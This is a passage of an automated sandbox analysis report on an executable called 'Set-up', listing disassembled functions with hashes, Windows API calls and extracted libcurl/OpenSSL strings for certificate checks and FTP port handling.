Instruction ID: 6aa2d8923108a5ee58e118d234080928a53205d252cd22ec09db8faa25490da4
Opcode Fuzzy Hash: 7c03aa6a55b1c149fc127b160820a88595bfc8582fa404d0bf537cf4087c10c7
Instruction Fuzzy Hash: 87F01C72B447206BD5249A18EC05F9BF369EBC4B21F188909B954672488370BC4186F2

Function 00D4B020 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00D4B04C

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 5103fad25d9864d68de743ddaf0b412b807424ecf272d2644271fb8fb452dc82
Instruction ID: 5cfe6e350bc4846111378622e238d89acd5c80b50c00f765538666997deaaab3
Opcode Fuzzy Hash: 5103fad25d9864d68de743ddaf0b412b807424ecf272d2644271fb8fb452dc82
Instruction Fuzzy Hash: 6EE0C23470020097CE20CA18C888A47772B7FD1321F2CCB68E02C8A154CB3BDC43C711

Function 00CE67E0 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,8004667E), ref: 00CE67FB

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: b46fe6738e0cca52e31aab8563e296ec4b2763d0a5f85f0b48e574f28afcaa6d
Instruction ID: b4dbb29dff53cb5c78a5f9d0bae928d33c2a7106771bb02529ca00e67aa0fa49
Opcode Fuzzy Hash: b46fe6738e0cca52e31aab8563e296ec4b2763d0a5f85f0b48e574f28afcaa6d
Instruction Fuzzy Hash: F6C012F5108200EFC7084B24D449A5E77EDEB48356F05441CB04AC2140DB749490CF16

Function 00D39270 Relevance: 1.4, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 00D3A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00D3A499
Part of subcall function 00D3A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00D3A4FB
Part of subcall function 00D3A440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00D3AA19

Part of subcall function 00D39B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,00D392A4,?,?,?,?,?,?,?,?,00000000), ref: 00D39B6E
Part of subcall function 00D39B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,00D34860,00000000), ref: 00D39C24

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 00D393C3

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: AdaptersAddressesgetenv$Openmemcpy
String ID:
API String ID: 1905038125-0
Opcode ID: 5c0a799c5328bc1d4a6fd231715550a4e296e86d22b6764342bd12e02078a7ce
Instruction ID: 64596d25f4bc25a7af999090ec752bd5aade0768557e9c2090460a287c627c5c
Opcode Fuzzy Hash: 5c0a799c5328bc1d4a6fd231715550a4e296e86d22b6764342bd12e02078a7ce
Instruction Fuzzy Hash: EB51B1B2904302ABD720DF24E89572AFBE4BF84354F0C052CF94983651E7B1E865DBB6

Function 0115B6F0 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,01156AB0,?,?,?,?,?,01156431), ref: 0115B701

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 31bd598d2e66af33275363c509d20d721eaa5d15897932ffc69e4b498b49e92d
Instruction ID: e3b4621ab6e9b8cc6943e82e34391a6bd6361863f756b25753fa9561712935ec
Opcode Fuzzy Hash: 31bd598d2e66af33275363c509d20d721eaa5d15897932ffc69e4b498b49e92d
Instruction Fuzzy Hash: 60D0A9B1D08B048BEB00BE6888C041A37E8BAA4214F84069EDEC41B242E339951487D2

Function 00E5CBC0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E37254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,00E340BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E5CBD2

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 5638ebd5281401686a4b6ac332aaf07d74d62452fd117ddc6a58924a46e2797d
Instruction ID: bcaab517f7a08e70139980d7235c87e6bc4d9f2a9554a381f33dd1145bd8c07c
Opcode Fuzzy Hash: 5638ebd5281401686a4b6ac332aaf07d74d62452fd117ddc6a58924a46e2797d
Instruction Fuzzy Hash: D0B09B664443019FE5565504B4934197251F6D0705FA45C31FA46D04B0D2129C58D546

Non-executed Functions

Function 00CF62E0 Relevance: 123.9, APIs: 9, Strings: 72, Instructions: 2363stringCOMMON

Download Yara Rule

APIs

strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00CF6E74
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00CF6F8A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00CF7184
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CF7263
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00CF75B8

Part of subcall function 00E4F870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 00E4F8AE

Strings

OpenSSL, xrefs: 00CF6DFC, 00CF78D3
Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s, xrefs: 00CF736B
%lx, xrefs: 00CF6524
Remove session ID again from cache, xrefs: 00CF7DD4
Unknown error, xrefs: 00CF6E6A, 00CF6E72, 00CF7941, 00CF7949
ipv6 address, xrefs: 00CF7AD7
OCSP response has expired, xrefs: 00CF8414
%02x, xrefs: 00CF65C8
pub_key, xrefs: 00CF6AD6, 00CF6BC4
SSL: Certificate issuer check failed (%s), xrefs: 00CF7867
SSL certificate issuer check ok (%s), xrefs: 00CF7CAF
Signature, xrefs: 00CF6D1F
SSL certificate verify result: %s (%ld), continuing anyway., xrefs: 00CF7D38
dsa, xrefs: 00CF6B71, 00CF6B90, 00CF6BAE, 00CF6BC9
No error, xrefs: 00CF6E65, 00CF793C
Public Key Algorithm, xrefs: 00CF6725
expire date: %.*s, xrefs: 00CF70E2
Could not find certificate ID in OCSP response, xrefs: 00CF840A
SSL: illegal cert name field, xrefs: 00CF8078
SSL: no alternative certificate subject name matches target %s '%s', xrefs: 00CF7B2A
Error computing OCSP ID, xrefs: 00CF806E
ipv4 address, xrefs: 00CF7AD2
SSL certificate status: %s (%d), xrefs: 00CF83B6
%02x:, xrefs: 00CF6CE8
%s certificate:, xrefs: 00CF6F11
Proxy, xrefs: 00CF6F01
issuer: %s, xrefs: 00CF71CE
Start date, xrefs: 00CF6887
subjectAltName does not match %s %s, xrefs: 00CF7B11
Unable to load public key, xrefs: 00CF69DB
hostname, xrefs: 00CF7AE1, 00CF7B10, 00CF7B29
Cert, xrefs: 00CF6D7F
rsa, xrefs: 00CF6C56, 00CF6C75
common name: %s (matched), xrefs: 00CF7F17
SSL certificate revocation reason: %s (%d), xrefs: 00CF83F1
SSL: unable to obtain common name from peer certificate, xrefs: 00CF7F29
[NONE], xrefs: 00CF7011
Invalid OCSP response, xrefs: 00CF7D4B, 00CF80B1
SSL: could not get X509-issuer name, xrefs: 00CF72C2
Subject, xrefs: 00CF648C
SSL: certificate subject name '%s' does not match target hostname '%s', xrefs: 00CF8133
start date: %.*s, xrefs: 00CF707C
SSL: Unable to read issuer cert (%s), xrefs: 00CF7995
/%s, xrefs: 00CF7489, 00CF7741
SSL certificate verify ok., xrefs: 00CF809E
Issuer, xrefs: 00CF64EF
No OCSP response received, xrefs: 00CF79D8
RSA Public Key, xrefs: 00CF6C31
Invalid OCSP response status: %s (%d), xrefs: 00CF77F8
SSL: public key does not match pinned public key, xrefs: 00CF82B2
Server, xrefs: 00CF6F06, 00CF6F10
OCSP response verification failed, xrefs: 00CF814C
BIO_new return NULL, OpenSSL error %s, xrefs: 00CF6E7D, 00CF7E52
Could not get peer certificate chain, xrefs: 00CF8122
subjectAltName: host "%s" matched cert's IP address!, xrefs: 00CF7607
<, xrefs: 00CF7F90
unexpected ssl peer type: %d, xrefs: 00CF7621
Version, xrefs: 00CF654F
Serial Number, xrefs: 00CF65F1
Error getting peer certificate, xrefs: 00CF8153
SSL: Unable to open issuer cert (%s), xrefs: 00CF7232
SSL certificate verify result: %s (%ld), xrefs: 00CF7FB0
vtls/openssl.c, xrefs: 00CF7BD2, 00CF7F54, 00CF8217, 00CF8278, 00CF8293
: , xrefs: 00CF78FE
Signature Algorithm, xrefs: 00CF66A6
%s/%s, xrefs: 00CF6E01, 00CF78D8
Expire date, xrefs: 00CF68EE
subject: %s, xrefs: 00CF7021
pqg, xrefs: 00CF6A29, 00CF6A7E, 00CF6B13, 00CF6B6C
SSL: could not get peer certificate, xrefs: 00CF6FD5
BIO_new_mem_buf NULL, OpenSSL error %s, xrefs: 00CF7954
subjectAltName: host "%s" matched cert's "%s", xrefs: 00CF80EC

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy$memcmpmemsetstrcpystrlen
String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
API String ID: 838718518-248801092
Opcode ID: c9e52391a19c482b4261376bc0ac1097fab8ddb0b91c240a3919f46637110955
Instruction ID: 78c02d6c5b42bb7be166aa91526fa06d85b362063859fee954383701eb622720
Opcode Fuzzy Hash: c9e52391a19c482b4261376bc0ac1097fab8ddb0b91c240a3919f46637110955
Instruction Fuzzy Hash: 850327B2D083446BE761AB209C42F7B76D9AF91708F04452CFE4D66283F771AA54C7A3

Function 0100E050 Relevance: 119.3, APIs: 64, Strings: 3, Instructions: 2082COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 0100E0B3
localeconv.MSVCRT ref: 0100E0BE
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0100E149
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0100E179
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0100E1D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0100E1FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0100E20F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100F886

Strings

d, xrefs: 0100EAAF
, xrefs: 0100FED0
nil), xrefs: 0101041D

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: free$isspacelocaleconv$_errno
String ID: $d$nil)
API String ID: 577766270-394766432
Opcode ID: e933ca2da1fd8233fc9c6e07825e1b6ce5acda3837861a4b577516e4e4502025
Instruction ID: 0fdc2554b4f855a509dc48d4fd6f08c0094c1e5d5104c99ba23c98f19129ed77
Opcode Fuzzy Hash: e933ca2da1fd8233fc9c6e07825e1b6ce5acda3837861a4b577516e4e4502025
Instruction Fuzzy Hash: 26138C706083428FE762DF28C08066ABBE1BFC9314F144E6DEAD59B395D775E845CB82

Function 00CCE480 Relevance: 91.8, APIs: 25, Strings: 27, Instructions: 803COMMON

Download Yara Rule

Strings

getsockname() failed: %s, xrefs: 00CCE905, 00CCEC1B
PRET, xrefs: 00CCE656
bind(port=%hu) failed: %s, xrefs: 00CCED00
PRET STOR %s, xrefs: 00CCE607
EPRT, xrefs: 00CCEF42
bind() failed, we ran out of ports, xrefs: 00CCEB15
REST %d, xrefs: 00CCE4A6
failed to resolve the address provided to PORT: %s, xrefs: 00CCE9DD
PORT, xrefs: 00CCEED7
[%s] ftp_state_use_port(), socket bound to port %d, xrefs: 00CCED32
%s |%d|%s|%hu|, xrefs: 00CCEF47
Failure sending PORT command: %s, xrefs: 00CCEF05
LIST, xrefs: 00CCE5F1
[%s] ftp_state_use_port(), opened socket, xrefs: 00CCEAE2
STOP, xrefs: 00CCC3C6, 00CCEA55
PRET %s, xrefs: 00CCE5FF
Failure sending EPRT command: %s, xrefs: 00CCEF6C
RETR_PREQUOTE, xrefs: 00CCE562
???, xrefs: 00CCEADC, 00CCEAE1, 00CCED2B, 00CCED31, 00CCED96, 00CCED9C
%s %s, xrefs: 00CCEEDC
,%d,%d, xrefs: 00CCEEBF
PRET RETR %s, xrefs: 00CCE5D9
[%s] -> [%s], xrefs: 00CCC2D2, 00CCC3D2, 00CCC596, 00CCE45F, 00CCE4FF, 00CCE56E, 00CCE662, 00CCEA61
NLST, xrefs: 00CCE5F6, 00CCE5FE
bind(port=%hu) on non-local address failed: %s, xrefs: 00CCEBC6
[%s] ftp_state_use_port(), listening on %d, xrefs: 00CCED9D
socket failure: %s, xrefs: 00CCE9D5

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$REST %d$RETR_PREQUOTE$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 0-1921080684
Opcode ID: 8a6f6eedc9e075f2e64baa35fa91b9a62919812dac285627ba3fab77c4996245
Instruction ID: 30ea7c2a422666ee8cd1cb71b3f044abd0c6e78121b9b3cc4768715c4f951741
Opcode Fuzzy Hash: 8a6f6eedc9e075f2e64baa35fa91b9a62919812dac285627ba3fab77c4996245
Instruction Fuzzy Hash: 02521471604300ABE725DB25DC85FAB7BE9AF82304F08492DF895C7292E770DE45C7A2

Function 00C8E620 Relevance: 62.3, APIs: 29, Strings: 6, Instructions: 1028COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 00C8E6F1

Strings

0, xrefs: 00C8EBCA
(nil), xrefs: 00C8ECCD
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00C8E9AA, 00C8EAEB
-, xrefs: 00C8EC74
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00C8E68E, 00C8E9AF, 00C8EAF0
.%d, xrefs: 00C8EE0E

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

